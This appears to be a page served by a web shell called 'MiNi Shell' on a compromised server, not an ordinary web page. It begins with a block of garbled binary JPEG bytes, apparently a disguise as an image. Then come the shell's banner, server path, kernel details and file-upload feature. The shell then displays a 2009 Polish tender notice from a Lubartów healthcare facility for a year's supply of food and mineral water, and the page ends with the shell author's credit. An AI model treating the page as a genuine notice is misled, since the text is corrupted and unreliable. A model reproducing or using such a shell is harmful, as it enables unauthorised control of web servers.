JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/244510-N-2009.html

<p class="kh_header"><b>Lubartów: DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH  I  WODY MINERALNEJ  - UMOWA NA OKRES 1 ROKU</b><br>
<b>Numer ogłoszenia: 244510 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny  Zakład Opieki Zdrowotnej , ul. Cicha 14, 21-100 Lubartów, woj. lubelskie, tel. 081 8556608, faks 081 8556608.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz-lubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH  I  WODY MINERALNEJ  - UMOWA NA OKRES 1 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - 5 Artykuły spożywcze
Zadanie 6 - Woda mineralna.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca musi spełniać warunki określone w art. 22 ust.1 ustawy  Prawo zamówień publicznych ( Dz.U. nr 164 z 2006r, poz. 1163 z póź. zm.). 
Oceny  spełnienia tych  warunków Zamawiający dokona na podstawie n/w dokumentów  :.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> VI. A) 	WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

1.  Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 oraz spełnia warunki ubiegania się o udzielenie zamówienia określone w art. 22 ust. 1 pkt 1 - 3  ustawy, na formularzu oświadczenia stanowiącym Załącznik Nr 7 do SIWZ.
2.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt. VI.A pkt. 2) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
4.	Dokumenty, o których mowa w punkcie VI.A. pkt.3 a i c  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w punkcie VI.A pkt. b  powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie VI.A pkt.3. zastępuję się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapis punktu VI. A..4 stosuje się odpowiednio.
6.  UWAGA:
6.1. W przypadku, gdy Wykonawca jako załącznik do oferty dołączy kopię dokumentu, to kopia taka winna być pisemnie potwierdzona przez upoważnionych przedstawicieli Wykonawcy za zgodność z oryginałem (z wyjątkiem pełnomocnictwa - patrz część X  pkt 13).
6.2.Zamawiający może zażądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu w przypadku, gdy kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
6.3 Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie niniejszego zamówienia publicznego, umowy regulującej współpracę tych wykonawców.

VI. B) 	WYKAZ OŚWIADCZEŃ I DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU  POTWIERDZENIA, ŻE OFEROWANE DOSTAWY ODPOWIADAJĄ WYMAGANIOM OKREŚLONYM PRZEZ ZAMAWIAJĄCEGO.
1.	Do oferty należy dołączyć próbki określone w części III SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzoz-lubartow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14 21-100 Lubartów, Sekcja Zamówień Publicznych i Zaopatrzenia, pokój nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Lubartowie, ul. Cicha 14 , 21-100 Lubartów, Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1
Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Mleko typu  Bebiko 1
350 g	50	sztuka	-------------------
2	Mleko typu Bebiko 2
350 g	80	sztuka	-------------------
3	Mleko typu Bebiko 2R
350 g	30	sztuka	---------------------
4	Mleko typu Bebiko 3R
350 g	10	sztuka	--------------------
5	Mleko typu Nan 1
350 g	50	sztuka	---------------------
6	Mleko typu Nan 2
350 g	80	sztuka	---------------------
7	Mleko typu Nan 3R
350 g	10	Sztuka	-------------------
8	Kaszka ryżowo - bananowa mleczna
230 g	150	Sztuka	1 sztuka
9	Kaszka ryżowo - jablkowa dla dzieci
230 g	100	Sztuka	1 sztuka
10	Kleik ryżowy 
180 g	60	sztuka	-----------------
11	Zupka-krem marchewkowa z ryzem typu Bobo vit. Od 5 miesiąca, 125 g	100	sztuka	-----------------
12	Zupa - krem jarzynowa z kurczakiem typu Bobo vit. Od 6 miesiąca, 125 g	300	sztuka	-----------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Kasza gryczana, op. 1 kg	50	Kilogram	------------------
2	Kasza manna, op.  0,5 kg	700	Kilogram	--------------------
3	Kasza jęczmienna, op.  1 kg	900	Kilogram	---------------------
4	Płatki owsiane, op.  0,40 kg	500	Kilogram	-------------------
5	Makarom świderki - bezjajeczny, op.  1000 g	900	kilogram	------------------
6	Makaron nitka rosołowa, op. 1000 g	400	Kilogram	-------------------
7	Makaron wstążka,
Op. 1000 g	500	Kilogram	---------------------
8	Makaron łazanki bezjajeczny, op. 400 g lub 500 g	60	Kilogram	-------------------
9	Ryż, op. 1 kg	1800	Kilogram	----------------
10	Chrupki kukurydziane, 
op.  250 g	150	Kilogram	1 opakowanie
11	Mąka ziemniaczana, op.1000 g	80	kilogram	-----------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3
Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Biszkopty okrągłe, 
op. 0,25 	150	Sztuk	-------------------
2	Harbatniki typu Petitki opakowanie 0,10	230	sztuk	------------------
3	Wafle śmietankowe, 
op. 20 g	600	sztuk	-----------------
4	Wafle suche,
 op. po 5 listków	20	sztuk	----------------
5	Cukier puder, op. 0,50	10	Kilogram	-----------------
6	Cukier kryształ , op.1 kg	6000	Kilogram	------------------
7	Cukier waniliowy, op. 0,02	30	sztuka	------------------
8	Miód naturalny, 
op. 0,026	1200	sztuka	-------------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4

Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Bulion o smaku wędzonki, op. 1000 g	8	Kilogram	1 op.
2	Chrzan w słoiczku,
 op. 320 g	300	Sztuk	-------------------
3	Koncentrant pomidorowy w słoiczku opakowanie 200 g lub 1 kg	250	Kilogram	1 op.
4	Kukurydza konserwowa, op. 0,42	60	Sztuka	---------------------
5	Ogórek konserwowy, 
op. 0,90	100	Sztuka	--------------------
6	Groszek konserwowy po odcieku, op. 0,24	500	sztuka	---------------------
7	Bulion - Żur śląski, 
op. 1000 g	10	Kilogram	---------------------
8	Papryka konserwowa opakoenie 0,85	60	Sztuka	--------------------
9	Soczewica,  	40	Kilogram	--------------------
10	Majonez typu Hellmans opakowanie 5 kg	600	Kilogram	100 g
11	Musztarda opakowanie 180 g sloik	500	Sztuka	----------------
12	Przyprawa w płynie typu Kucharek, op. 1 L	50	Litr	250 ml
13	Ocet opakowanie 0,50	40	Litr	---------------
14	Olej typu Vita, op. 1L	700	Litr	-------------------
15	Margaryna typu Rama combi, op. 3,7 L	18	Litr	--------------------
16	Sos sałatkowy typu Prymat, op. 920 g	5	Kilogram	150 g
17	Sos pieczeniowy ciemny, op. 30 g	4	Kilogram	30 g
18	Sos sojowy, op. 150 g	5	Sztuka	------------------
19	Sos neapolitański,
 op. 1,5 kg 	10	Kilogram	100 g
20	Ananas w puszce, op. 565 	15	Sztuka	---------------------
21	Seler konserwowy, opakowanie 0,32	5	Sztuka	-------------------
22	Koncentrat napojów owocowych, op. 6,5 kg 	300	kilogram	0,5 kg
23	Fasola biała średnia	70	kilogram	-------------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5

Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Pieprz ziołowy, op. 0,02	4	Kilogram	------------------
2	Pieprz naturalny, op.  0,50 lub 0,02	8	Kilogram	1 opakowanie
3	Budyń bez cukru, 
op. 41 g	200	Sztuka	--------------------
4	Cynamon, op. 20 g	10	sztuka	------------------
5	Galaretka owocowa, op. 79 g	100	Sztuka	-------------------
6	Kisiel bez cukru, op. 40 g	200	Sztuka	-------------------
7	Przyprawa warzywna typu Kucharek	150	Kilogram	0,5 kg
8	Kwasek cytrynowy, op. 20 g	1300	Sztuka	-------------------
9	Liść laurowy op. 0,05	500	sztuka	-------------------
10	Przyprawa carry, op. 15 g	20	Sztuka	-------------------
11	Majeranek, op. 0,06	160	Sztuka	-------------------
12	Herbata expresowa z nitką,
Op.  100szt	4	opakowanie	5 sztuk
13	Herbata granulowana typu Assam, op.  0,10	350	Kilogram	100 g
14	Kawa zbożowa typu Inka op. 0,15	40	Kilogram	-------------------
15	Oregano, op. 0,01	15	Sztuka	-------------------
16	Papryka mieloda słodka, op. 0,02	40	Sztuka	-------------------
17	Papryka mielona ostra, op.0,02	20	Sztuka	-------------------
18	Ziele angielskie, op. 0,015	500	Sztuka	-------------------
19	Sól, op. 1 kg	2000	Kilogram	-------------------
20	Żelatyna spożywcza, opakowanie 0,05	10	Sztuka	-------------------
21	Grzyby suszone podgrzybek, op. 0,05	5	Sztuka	-------------------
22	Wiórki kokosowe, op. 0,10	10	Sztuka	-------------------
23	Rodzynki, op. 0,10	10	Sztuka	-------------------
24	Susz wigilijny Polski: jabłka 1,50 gruszka 0,30 śliwka 0,20	2	Kilogram	-------------------
25	Bulion rosołowy ,
 op. 2,2 kg	5	Kilogram	100 g
26	Koper suszony, opakowanie 0,10	10	Sztuka	-------------------
27	Natka suszona, opakowanie 0,10	20	Sztuka	-------------------
28	Śliwka kalifornijska suszona, opakowania 0,10	5	sztuka	-------------------
29	Przyprawa do kurczaka, 
op. 1 kg	5	Kilogram	250 g
30	Drożdże, op. 0,10	2	kilogram	-------------------
31	Ziarno sezam, op. 0,10 kg	5	sztuka	1 op.
32	Kakao, op. 0,10	1	kilogram	-------------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Woda mineralna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6
Lp.	Asortyment	zamawiana ilość na rok 	Jednostka miary	Wymagane próbki
1	Woda mineralna gazowana 1,5 l	3804	Sztuka	------------------
2	Woda mineralna niegazowana 1,5 l	402	Sztuka	--------------------
3	Woda mineralna gazowana 0,5 l	96	Sztuka	---------------------
4	Woda mineralana niegazowana 0,5 l	48	sztuka	---------------------.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com